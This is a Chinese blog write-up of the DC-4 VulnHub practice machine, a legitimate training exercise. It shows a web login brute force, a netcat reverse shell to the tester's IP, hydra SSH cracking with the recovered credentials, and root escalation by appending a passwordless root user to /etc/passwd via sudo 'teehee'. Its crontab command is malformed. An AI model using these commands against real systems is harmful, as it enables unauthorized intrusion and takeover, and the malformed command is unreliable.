DC4-vulnhub渗透测试

前言

DC4-vulnhub靶机渗透

之前下载的靶机,把它打完吧

渗透过程

考察:密码爆破

image-20200511175353623

端口扫描发现这两个端口

访问80端口

image-20200511175618070

暴力破解密码得到

1
2
username:admin
password:123456

登陆后台

这里有命令执行

image-20200511175953892

1
nc -e /bin/sh 192.168.1.76 7777

反弹shell

image-20200511180237402

image-20200511180356746

这里有jim的历史密码,ssh 破解一波

1
hydra -l jim -P 1.txt -t 11 ssh://192.168.1.87

image-20200511180830489

1
jim:jibril04

ssh连接后查看mbox

image-20200511181030426

得到了charles的账号密码,切换成charles

image-20200511181136356

发现这里的teehee是有root权限的

image-20200511181255062

将字符串追加到某文件的功能。

提权思路一:追加一个用户到etc/passwd的root组

1
echo 'test::0:0:::/bin/bash'|sudo teehee -a /etc/passwd

image-20200511181702819

image-20200511181740474

提权成功

提权思路二:

看看那些命令有root权限

1
find / -type f -perm -u=s 2>/dev/null  查看SUID文件

image-20200511182121104

exim4提权

提权思路三:使用cronta提权

最后这个思路是参考别人的walkthrough

向/etc/crontab文件中写入新的定时任务,把时间全设置为*,这样就是每分钟执行一次,再将/bin/sh的权限设置为4777

image-20200511182312711

1
echo '***** chmod 4777 /bin/sh | sudo teehee -a /etc/crontab' 写入定时任务

总结

写得简略,但是中间尝试了很多次。加油

Author: 我是小吴啦
Link: http://yoursite.com/2020/05/11/DC4-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.